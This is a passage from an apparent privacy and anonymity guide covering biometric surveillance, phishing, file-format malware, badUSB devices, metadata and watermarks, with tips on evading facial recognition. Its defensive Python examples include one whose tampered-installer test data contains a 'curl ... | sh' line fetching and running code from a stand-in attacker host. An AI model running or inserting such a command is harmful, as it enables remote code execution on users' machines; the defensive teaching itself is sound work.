Bellingcat, Advanced Guide on Verifying Video Content https://www.bellingcat.com/resources/how-tos/2017/06/30/advanced-guide-verifying-video-content/ [Archive.org]
Bellingcat, Using the Sun and the Shadows for Geolocation https://www.bellingcat.com/resources/2020/12/03/using-the-sun-and-the-shadows-for-geolocation/ [Archive.org]
Bellingcat, Navalny Poison Squad Implicated in Murders of Three Russian Activists https://www.bellingcat.com/news/uk-and-europe/2021/01/27/navalny-poison-squad-implicated-in-murders-of-three-russian-activists/ [Archive.org]
Bellingcat, Berlin Assassination: New Evidence on Suspected FSB Hitman Passed to German Investigators https://www.bellingcat.com/news/2021/03/19/berlin-assassination-new-evidence-on-suspected-fsb-hitman-passed-to-german-investigators/ [Archive.org]
Bellingcat, Digital Research Tutorial: Investigating a Saudi-Led Coalition Bombing of a Yemen Hospital https://www.youtube.com/watch?v=cAVZaPiVArA [Invidious]
Bellingcat, Digital Research Tutorial: Using Facial Recognition in Investigations https://www.youtube.com/watch?v=awY87q2Mr0E [Invidious]
Bellingcat, Digital Research Tutorial: Geolocating (Allegedly) Corrupt Venezuelan Officials in Europe https://www.youtube.com/watch?v=bS6gYWM4kzY [Invidious]
Even if you are not looking at the camera, they can still figure out who you are166, make out your emotions167, analyze your gait168‘169’170, read your lips171, analyze the behavior of your eyes172, and probably guess your political affiliation173’174.
Contrary to popular belief and pop culture, modern gait recognition systems are not fooled by simply changing how you walk (e.g. by putting something uncomfortable in your shoe): they analyze how the muscles of your whole body move as you perform certain actions. The best way to fool modern gait recognition is to wear loose clothes that hide that movement.
Other things that can be used to identify you include your earlobes, which are claimed to be even more identifiable than fingerprints, and even the shape of your skull. Soft head coverings such as balaclavas are therefore not recommended for obscuring your identity: they make you look incredibly suspicious while also conforming to the shape of your skull.
[][113]
(Illustration from https://www.nature.com/articles/s41598-020-79310-1 [Archive.org])
[][115]
(illustration from https://rd.springer.com/chapter/10.1007/978-3-030-42504-3_15 [Archive.org])
Those platforms (Google/Facebook) already know who you are for a few reasons:
Because you have or had a profile with them, and you identified yourself.
Even if you never made a profile on those platforms, you still have one without even knowing it175‘176’177‘178’179.
Because other people have tagged you or identified you in their holidays/party pictures.
Because other people have put a picture of you in their contact list, which they then shared with those platforms.
Here is also an insightful demo of Microsoft Azure you can try for yourself at https://azure.microsoft.com/en-us/services/cognitive-services/face/#demo where you can detect emotions and compare faces from different pictures.
Governments already know who you are because they have your ID/Passport/Driving License pictures and often added biometrics (Fingerprints) in their database. Those same governments are integrating those technologies (often provided by private companies such as the Israeli Oosto180, Clearview AI181‘182, or NEC183) in their CCTV networks to look for “persons of interest”184. And some heavily surveilled states like China have implemented widespread use of Facial Recognition for various purposes185’186 including possibly identifying ethnic minorities187. A simple face recognition error by some algorithm can ruin your life188’189.
Here are some resources detailing some techniques used by Law Enforcement today:
CCC video explaining current Law Enforcement surveillance capabilities: https://media.ccc.de/v/rc3-11406-spot_the_surveillance#t=761 [Archive.org]
EFF SLS: https://www.eff.org/sls [Archive.org]
Apple has made Face ID mainstream and is pushing its use to log you into many services, including banking apps.
The same goes for fingerprint authentication, which many smartphone makers have mainstreamed. A simple picture in which your fingers appear can be used to de-anonymize you190‘191’192’193.
The same goes for your voice, which can be analyzed for various purposes, as shown in the recent Spotify patent194.
Even your iris can be used for identification in some places195.
We can safely imagine a near future where you will not be able to create accounts or sign in anywhere without providing unique biometrics (A suitable time to re-watch Gattaca196, Person of Interest197 , and Minority Report198). And you can safely imagine how useful these large biometrics databases could be to some interested third parties.
In addition, if you are already de-anonymized, all this information can be used against you through deepfakes199: crafted false pictures, videos or voice recordings200, which have already been used for such purposes201’202. There are even commercial services for this readily available, such as https://www.respeecher.com/ [Archive.org] and https://www.descript.com/overdub [Archive.org].
See this demo: https://www.youtube.com/watch?v=t5yw5cR79VA [Invidious]
At this time, there are a few steps203 you can use to mitigate (and only mitigate) face recognition when conducting sensitive activities where CCTV might be present:
Wear a facemask as they have been proven to defeat some face recognition technologies204 but not all205.
Wear a baseball cap or hat to mitigate identification from high-angle CCTVs (filming from above) from recording your face. Remember this will not help against front-facing cameras.
Wear sunglasses in addition to the facemask and baseball cap to mitigate identification from your eye’s features.
Consider wearing special sunglasses (expensive, unfortunately) called “Reflectacles” https://www.reflectacles.com/ [Archive.org]. There was a small study showing their efficiency against IBM and Amazon facial recognition206.
All of that might still be useless because of the gait recognition mentioned earlier, but there might be hope if you have a 3D printer: https://gitlab.com/FG-01/fg-01 [Archive.org]
(see Gait Recognition and Other Long-Range Biometrics)
(Note that if you intend to use these where advanced facial recognition systems have been installed, these measures could by themselves flag you as suspicious and trigger a human check.)
Phishing207 is a social engineering208 type of attack where an adversary could try to extract information from you by pretending or impersonating something/someone else.
A typical case is an adversary using a man-in-the-middle209 attack, or a fake e-mail or phone call, to ask for your credentials for a service, for instance by impersonating a financial institution.
Such attacks can also be used to de-anonymize someone by tricking them into downloading malware or into revealing personal information over time. The only defense is not to fall for them: verify who you are really dealing with before acting, and use common sense.
These have been used countless times since the early days of the internet; the classic example is the “419 scam” (see https://en.wikipedia.org/wiki/Advance-fee_scam [Wikiless] [Archive.org]).
Here is a good video if you want to learn a bit more about phishing types: Black Hat, Ichthyology: Phishing as a Science https://www.youtube.com/watch?v=Z20XNp-luNA [Invidious].
Using file-format tricks (embedded scripts and macros, polyglot files) or steganography, it is easy to embed malware into common file formats such as Office documents, pictures, videos, and PDF documents.
These can be as simple as HTML tracking links or complex targeted malware.
These could be simple pixel-sized images210 hidden in your e-mails that would call a remote server to try and get your IP address.
These could be exploiting a vulnerability in an outdated format or an outdated reader211. Such exploits could then be used to compromise your system.
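Here is an added example (not code from this guide or from any project it cites) of the kind of check you can run on an HTML e-mail before letting a mail client render it. The script parses the message, lists remote images that look like tracking pixels (tiny or hidden images fetched from a remote server, which reveal your IP address and the moment you opened the message), and flags links whose visible text does not match where they really point, or whose host uses Punycode or non-Latin characters (the lookalike-domain trick used in phishing). The message and every domain name in it are constructed for the example; the Cyrillic letter in the second link is written as the escape `\u0430` so that it is visible in the source.

```python
"""Flag tracking pixels and deceptive links in an HTML e-mail.

Added example for this guide (not code from the guide or any project it cites).
The message below is constructed; its domain names are assumptions, not real sites.
"""
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collect every <img> attribute dict and every <a href> with its visible text."""

    def __init__(self):
        super().__init__()
        self.images, self.links = [], []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "img":
            self.images.append(a)
        elif tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    """Lowercased hostname with a leading 'www.' dropped, or '' if there is none."""
    host = (urlparse(url if "://" in url else "//" + url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def _is_tiny_or_hidden(a):
    """1x1 (or smaller) dimensions or a hidden style: the classic tracking pixel."""
    for key in ("width", "height"):
        value = a.get(key, "").strip().lower()
        value = value[:-2] if value.endswith("px") else value
        if value.isdigit() and int(value) <= 1:
            return True
    style = a.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def _scripts(text):
    """Unicode scripts (first word of each character name) used by the letters in text."""
    return {unicodedata.name(c, "?").split()[0] for c in text if c.isalpha()}


def _link_reasons(href, text):
    """Why a link deserves a second look; an empty list means nothing suspicious was seen."""
    reasons = []
    if urlparse(href).scheme.lower() not in ("http", "https"):
        return reasons
    host = _host(href)
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode host")
        try:  # decode so the script check below sees the real letters
            host = host.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    if _scripts(host) - {"LATIN"}:
        reasons.append("non-Latin host characters")
    if "." in text and " " not in text:  # visible text looks like a URL or a domain
        shown = _host(text)
        if shown and shown != host:
            reasons.append("visible text points at " + shown)
    return reasons


def scan_email_html(html):
    """Return remote images, probable tracking pixels and links with their warning reasons."""
    p = _Collector()
    p.feed(html)
    remote = [a for a in p.images
              if urlparse(a.get("src", "")).scheme.lower() in ("http", "https")]
    return {
        "remote_images": [a["src"] for a in remote],
        "tracking_pixels": [a["src"] for a in remote if _is_tiny_or_hidden(a)],
        "suspicious_links": [(href, r) for href, text in p.links
                             if (r := _link_reasons(href, text))],
    }


# Constructed phishing-style message (no real addresses). \u0430 is Cyrillic 'a'.
SAMPLE_HTML = """<html><body>
<p>Your account has been locked. Sign in to restore access:</p>
<a href="http://xn--80ak6aa92e.com/login">https://apple.com/login</a><br>
<a href="https://\u0430pple.com/">Sign in</a><br>
<a href="https://secure-login.example.net/">https://www.example.net/</a><br>
<a href="https://example.org/help">Help</a>
<img src="https://track.example.com/open?id=4a1f" width="1" height="1" alt="">
<img src="https://cdn.example.com/logo.png" width="200" height="60" alt="logo">
<img src="cid:inline-logo" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    for key, value in scan_email_html(SAMPLE_HTML).items():
        print(key, value)
```

The checks are deliberately strict: a link whose text shows example.net but points at a subdomain is reported too, and any non-Latin host is reported even though legitimate internationalized domains exist. For a message that asks you to log in somewhere, a false positive costs a few seconds; a missed lookalike costs your credentials. Note that the logo image is also remote: even a full-size remote image reveals your IP address when fetched, so the real mitigation is a client that does not load remote content at all.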
See these good videos for more explanations on the matter:
What is a File Format? https://www.youtube.com/watch?v=VVdmmN0su6E [Invidious]
Ange Albertini: Funky File Formats: https://www.youtube.com/watch?v=hdCs6bPM4is [Invidious]
You should always use extreme caution. To mitigate these attacks, this guide will later recommend the use of virtualization (See Appendix W: Virtualization) to mitigate leaking any information even in case of opening such a malicious file.
If you want to learn how to try detecting such malware, see Appendix T: Checking files for malware
So, you are using Tor Browser or Brave Browser over Tor. You could be using those over a VPN for added security. But you should keep in mind that there are exploits212 for vulnerabilities known to an adversary but not yet to the app/browser developer (so-called zero-days). Such exploits could be used to compromise your system and reveal details that de-anonymize you, such as your IP address.
A real use case of this technique was the Freedom Hosting213 case in 2013, where the FBI inserted malware214 using a Firefox browser exploit on a Tor website. This exploit allowed them to reveal details of some users. More recently, the notable SolarWinds215 supply-chain attack breached several US government institutions by inserting a backdoor into the vendor's official, signed software updates.
In some countries, malware is simply mandatory and/or distributed by the state itself. This is the case for instance in China with WeChat216, which can then be used in combination with other data for state surveillance217.
There are countless examples of malicious browser extensions, smartphone apps, and various apps that have been infiltrated with malware over the years.
Here are some steps to mitigate this type of attack:
You should never have 100% trust in the apps you are using.
You should always check that you are using the latest version of such apps before use and, ideally, validate each download against the developer's published signature or checksum where available.
You should not run such apps directly on the host system; use a virtual machine for compartmentalization instead.
To reflect these recommendations, this guide will therefore later guide you in the use of Virtualization (See Appendix W: Virtualization) so that even if your Browser/Apps get compromised by a skilled adversary, that adversary will find himself stuck in a sandbox218 without being able to access identifying information or compromise your system.
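As an added example of the "validate each download" step above (this is illustration code written for this guide, not a tool from any project it mentions), here is a small Python script that checks downloaded files against a SHA256SUMS-style list, reports tampered and unlisted files, and calls the system gpg to verify the detached signature that most projects publish next to their downloads. The installer bytes and the sums list are constructed for the example; the gpg helper assumes gpg is installed and that the developer's public key was already imported from an independent, trusted source.

```python
"""Verify downloaded files against a SHA256SUMS list and a detached GPG signature.

Added example for this guide, not code from any project it mentions.
The files and the SHA256SUMS text below are constructed for the example.
"""
import hashlib
import hmac
import shutil
import subprocess


def parse_sums(text):
    """Parse sha256sum output ('<hex digest>  <filename>' per line) into {filename: digest}."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        expected[name.strip().lstrip("*")] = digest.lower()  # '*' marks binary mode
    return expected


def verify_downloads(sums_text, files):
    """files: {filename: bytes}. Returns {filename: 'ok' | 'MISMATCH' | 'not in list'}.

    A single changed byte yields MISMATCH, and a file that the developer never listed
    is never silently accepted.
    """
    expected = parse_sums(sums_text)
    results = {}
    for name, data in files.items():
        actual = hashlib.sha256(data).hexdigest()
        if name not in expected:
            results[name] = "not in list"
        elif hmac.compare_digest(actual, expected[name]):
            results[name] = "ok"
        else:
            results[name] = "MISMATCH"
    return results


def gpg_verify(signature_path, signed_path):
    """Check a detached signature with the system gpg.

    Assumes gpg is installed and the signer's public key was imported beforehand from a
    source independent of the download server. Returns True only when gpg exits 0
    (good signature by a key in your keyring). Not exercised offline."""
    if shutil.which("gpg") is None:
        raise RuntimeError("gpg is not installed")
    proc = subprocess.run(["gpg", "--verify", signature_path, signed_path],
                          capture_output=True, text=True)
    return proc.returncode == 0


# Constructed sample: a good download, a tampered copy, and the sums list the developer
# would publish (the list itself must be signature-checked with gpg_verify first).
GOOD_INSTALLER = b"#!/bin/sh\necho 'installing tor-browser'\n"
TAMPERED_INSTALLER = GOOD_INSTALLER + b"curl http://evil.example/stage2 | sh\n"
SHA256SUMS = (hashlib.sha256(GOOD_INSTALLER).hexdigest() + "  tor-browser.sh\n"
              + "0" * 64 + "  other-tool.tar.gz\n")

if __name__ == "__main__":
    print(verify_downloads(SHA256SUMS, {"tor-browser.sh": GOOD_INSTALLER,
                                        "other-tool.tar.gz": b"placeholder",
                                        "unlisted.zip": b"?"}))
    print(verify_downloads(SHA256SUMS, {"tor-browser.sh": TAMPERED_INSTALLER}))
```

A checksum published next to the download on the same server only protects against corruption: an attacker who can replace the file can replace the checksum too. What protects you is the signature over the sums list (or over the file itself), verified with a key whose fingerprint you obtained through a different channel, for instance from the project's documentation reached over Tor from another network. Also remember that gpg exits 0 for a good signature by any key in your keyring, so importing a key from the same compromised page defeats the whole check.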
There are readily available, cheap commercial “badUSB”219 devices that can deploy malware, log your typing, geolocate you, listen to you or take control of your laptop just by being plugged in. Here are some examples that you can already buy yourself:
Hak5, USB Rubber Ducky https://shop.hak5.org/products/usb-rubber-ducky-deluxe [Archive.org]
Hak5, O.MG Cable https://www.youtube.com/watch?v=V5mBJHotZv0 [Invidious]
AliExpress https://www.aliexpress.com/i/4000710369016.html [Archive.org]
Such devices can be implanted anywhere (charging cable, mouse, keyboard, USB key …) by an adversary and can be used to track you or compromise your computer or smartphone. The most notable example of malware spreading through USB devices is probably Stuxnet220, discovered in 2010, which propagated via infected USB drives.
While you could inspect a USB key physically, scan it with various utilities and check that its components are genuine, you will most likely never discover complex malware embedded by a skilled adversary in genuine parts of a genuine USB key without advanced forensics equipment221.
To mitigate this, never trust such devices and never plug them into sensitive equipment. If you use a charging cable, consider a USB data-blocking adapter that allows charging but no data transfer; such devices are readily available in many online shops. You should also consider disabling USB ports entirely in the BIOS/UEFI of your computer unless you need them (if you can).
This might sound a bit familiar as this was already partially covered previously in the Your CPU section.
Malware and backdoors can be embedded directly into your hardware components. Sometimes those backdoors are implemented by the manufacturer itself, such as the Intel ME (Management Engine) in the case of Intel CPUs. In other cases, such backdoors can be implanted by a third party that intercepts new hardware between the vendor and delivery to the customer222.
Such malware and backdoors can also be deployed by an adversary using software exploits. Many of these are called rootkits223 within the tech world. These types of malware are usually harder to detect and mitigate because they are implemented at a lower level than userspace224, often in the firmware225 of the hardware components themselves.
What is firmware? Firmware is a low-level operating system for devices. Each component in your computer probably has firmware including for instance your disk drives. The BIOS226/UEFI227 system of your machine for instance is a type of firmware.
These can allow remote management and are capable of enabling full control of a target system silently and stealthily.
As mentioned previously, these are harder for users to detect, but some limited steps can be taken to mitigate some of them: protect your device from tampering and, where possible, re-flash the BIOS/firmware from a trusted image. Unfortunately, if such malware or a backdoor is implemented by the manufacturer itself, it becomes extremely difficult to detect and disable.
This can be obvious to many but not to all. Most files have metadata attached to them. Good examples are pictures that store EXIF228 information, which can hold a lot of detail such as GPS coordinates, which camera/phone model took the picture, and precisely when it was taken. While this information might not directly give away who you are, it could tell exactly where you were at a certain moment, which could allow others to use various sources to find you (CCTV or other footage taken at the same place at the same time during a protest, for instance). Before uploading any file to such platforms, you must inspect it for any properties that might hold information leading back to you.
Here is an example of EXIF data that could be on a picture:
[][133]
(Illustration from Wikipedia)
This also works for videos. Yes, videos are geo-tagged too, and many people are unaware of this. Here is, for instance, a very convenient tool to geo-locate YouTube videos: https://mattw.io/youtube-geofind/location [Archive.org]
For this reason, you will always have to be incredibly careful when uploading files using your anonymous identities and check the metadata of those files.
Even if you publish a plain text file, you should always double or triple-check it for any information leakage before publishing. You will find some guidance about this in the Some additional measures against forensics section at the end of the guide.
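The following is an added example written for this guide (not code from the guide or from any tool it links to) showing what "check the metadata" means at the byte level for a JPEG. It walks the file's marker segments, reads the GPS position out of the Exif APP1 segment, and produces a copy with the metadata segments removed, using only the Python standard library. The file it runs on is constructed in the script: it has the structure of a JPEG (JFIF header, Exif block with a GPS IFD, a comment, a dummy quantization table, a scan header) but is not a decodable image, and its coordinates are invented.

```python
"""Walk a JPEG's marker segments, read the Exif GPS position, and strip metadata.

Added example for this guide, not code from the guide or any tool it mentions.
Standard library only; the sample file below is constructed and not a real photo.
"""
import struct


def iter_segments(data):
    """Yield (marker, start, end) for each segment up to and including the SOS header.

    start..end covers the whole segment (marker bytes plus payload). After SOS the
    entropy-coded scan data follows without a length field, so the walk stops there."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0x01 or 0xD0 <= marker <= 0xD9:  # standalone markers (RSTn, SOI, EOI)
            yield marker, pos, pos + 2
            if marker == 0xD9:
                return
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment at offset %d" % pos)
        end = pos + 2 + struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, end
        if marker == 0xDA:  # SOS
            return
        pos = end


# APP1..APP15 (Exif, XMP, ICC, Photoshop/IPTC, ...) and COM carry metadata. APP0 (JFIF)
# is kept because decoders expect it. Dropping APP2 (ICC profile) may shift colours a
# little; that is the price of not shipping a profile that can name your device.
_DROP = {0xFE} | set(range(0xE1, 0xF0))


def strip_metadata(data):
    """Copy of data without metadata segments. The scan data is untouched, so visible
    clues and sensor-noise fingerprints inside the pixels are NOT removed."""
    out, last_end = bytearray(data[:2]), 2
    for marker, start, end in iter_segments(data):
        if marker not in _DROP:
            out += data[start:end]
        last_end = end
    out += data[last_end:]  # scan data through EOI, copied verbatim
    return bytes(out)


def exif_gps(data):
    """(latitude, longitude) in decimal degrees from the Exif GPS IFD, or None."""
    tiff = None
    for marker, start, end in iter_segments(data):
        if marker == 0xE1 and data[start + 4:start + 10] == b"Exif\x00\x00":
            tiff = data[start + 10:end]  # TIFF structure; all offsets are relative to it
            break
    if tiff is None or tiff[:2] not in (b"II", b"MM"):
        return None
    bo = "<" if tiff[:2] == b"II" else ">"  # TIFF byte order
    u16 = lambda o: struct.unpack(bo + "H", tiff[o:o + 2])[0]
    u32 = lambda o: struct.unpack(bo + "I", tiff[o:o + 4])[0]

    def read_ifd(off):  # {tag: (type, count, position of the 4-byte value field)}
        return {u16(e): (u16(e + 2), u32(e + 4), e + 8)
                for e in range(off + 2, off + 2 + 12 * u16(off), 12)}

    ifd0 = read_ifd(u32(4))
    if 0x8825 not in ifd0:  # GPSInfo pointer
        return None
    gps = read_ifd(u32(ifd0[0x8825][2]))
    if not all(tag in gps for tag in (1, 2, 3, 4)):  # LatRef, Lat, LonRef, Lon
        return None

    def dms(value_tag, ref_tag):
        off = u32(gps[value_tag][2])  # three RATIONALs never fit inline: field is an offset
        d, m, s = (u32(off + 8 * i) / u32(off + 8 * i + 4) for i in range(3))
        ref = tiff[gps[ref_tag][2]:gps[ref_tag][2] + 1]
        deg = d + m / 60 + s / 3600
        return -deg if ref in (b"S", b"W") else deg

    return dms(2, 1), dms(4, 3)


def _build_sample_jpeg():
    """Constructed JPEG-shaped bytes with an Exif GPS IFD; not a decodable image."""
    entry = lambda tag, typ, count, val: struct.pack("<HHI", tag, typ, count) + val
    rat = lambda *p: b"".join(struct.pack("<II", n, d) for n, d in p)
    # TIFF layout: header @0, IFD0 @8 (18 bytes), GPS IFD @26 (54 bytes), lat @80, lon @104
    ifd0 = struct.pack("<H", 1) + entry(0x8825, 4, 1, struct.pack("<I", 26)) + bytes(4)
    gps = (struct.pack("<H", 4) + entry(1, 2, 2, b"N\x00\x00\x00")
           + entry(2, 5, 3, struct.pack("<I", 80)) + entry(3, 2, 2, b"E\x00\x00\x00")
           + entry(4, 5, 3, struct.pack("<I", 104)) + bytes(4))
    tiff = (b"II*\x00" + struct.pack("<I", 8) + ifd0 + gps
            + rat((48, 1), (51, 1), (296, 10))  # 48 deg 51' 29.6" N (invented)
            + rat((2, 1), (17, 1), (40, 1)))  # 2 deg 17' 40" E (invented)
    seg = lambda m, payload: bytes([0xFF, m]) + struct.pack(">H", len(payload) + 2) + payload
    return (b"\xff\xd8" + seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
            + seg(0xE1, b"Exif\x00\x00" + tiff) + seg(0xFE, b"Shot on my phone")
            + seg(0xDB, bytes(2)) + seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")
            + b"\x12\x34\xff\x00\x56" + b"\xff\xd9")


SAMPLE_JPEG = _build_sample_jpeg()

if __name__ == "__main__":
    print("GPS:", exif_gps(SAMPLE_JPEG))
    clean = strip_metadata(SAMPLE_JPEG)
    print("after strip:", exif_gps(clean), [hex(m) for m, _, _ in iter_segments(clean)])
```

Two caveats a practitioner should keep in mind. First, stripping marker segments removes Exif, XMP, IPTC and comments, but not what is in the pixels: a street sign, a reflection, or the camera sensor's noise pattern used for lens/camera identification survives untouched. Second, other containers (PNG tEXt chunks, MP4 atoms, PDF Info dictionaries, Office document properties) need their own parsers; the same "walk the container, drop what is not image data" approach applies, but the byte layout does not.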
Pictures/Videos often contain visible watermarks indicating who is the owner/creator but there are also invisible watermarks in various products aiming at identifying the viewer itself.
So, if you are a whistleblower thinking about leaking a picture, audio or video file, think twice. There is a good chance it contains an invisible watermark that identifies you as the viewer. Such watermarks can be enabled with a simple switch in tools like Zoom (video229 or audio230) or with extensions231 for popular apps such as Adobe Premiere Pro, and they can be inserted by various content management systems.
For a recent example where someone leaking a Zoom meeting recording was caught because it was watermarked: https://theintercept.com/2021/01/18/leak-zoom-meeting/ [Tor Mirror] [Archive.org]
Such watermarks can be inserted by various products232‘233’234‘235 using Steganography236 and can resist compression237 and re-encoding238’239.
These watermarks are not easily detectable and could allow identification of the source despite all efforts.
In addition to watermarks, the camera used for filming (and therefore the device used for filming) a video can also be identified using various techniques such as lens identification240 which could lead to de-anonymization.
Be extremely careful when publishing videos/pictures/audio files from known commercial platforms as they might contain such invisible watermarks in addition to details in the images themselves. There is no guaranteed 100% protection against those. You will have to use common sense.
Did you know your printer is most likely spying on you too, even if it is not connected to any network? This is a well-known fact among people in the IT community but little known outside it.
Yes … Your printers can be used to de-anonymize you as well as explained by the EFF here https://www.eff.org/issues/printers [Archive.org]
With this (old but still relevant) video explaining how from the EFF as well: https://www.youtube.com/watch?v=izMGMsIZK4U [Invidious]
Many printers print an invisible watermark on every page that allows the printer to be identified. This is called printer steganography241. There is no tangible way to mitigate this other than to inform yourself about your printer and make sure it does not print any such watermark. This is important if you intend to print anonymously.
Here is an (old but still relevant) list of printers and brands who do not print such tracking dots provided by the EFF https://www.eff.org/pages/list-printers-which-do-or-do-not-display-tracking-dots [Archive.org]
Here are also some tips from the Whonix documentation (https://www.whonix.org/wiki/Printing_and_Scanning [Archive.org]):
Never print in color: the tracking dots are usually absent when no color toner/cartridge is used242.
Did you ever see a document with blurred text? Did you ever make fun of those movies/series where they “enhance” an image to recover seemingly impossible-to-read information?
Well, there are techniques for recovering information from such documents, videos, and pictures.
Here is, for example, an open-source project you could use to recover text from some pixelated images: https://github.com/beurtschipper/Depix [Archive.org]
This is of course an open-source project available for all to use, and you can imagine that such techniques have already been used by adversaries. They could be used to reveal blurred information in published documents that could then be used to de-anonymize you.
There are also tutorials on applying such techniques with photo editing tools such as GIMP, for instance https://medium.com/@somdevsangwan/unblurring-images-for-osint-and-more-part-1-5ee36db6a70b [Archive.org] followed by https://medium.com/@somdevsangwan/deblurring-images-for-osint-part-2-ba564af8eb5d [Scribe.rip] [Archive.org]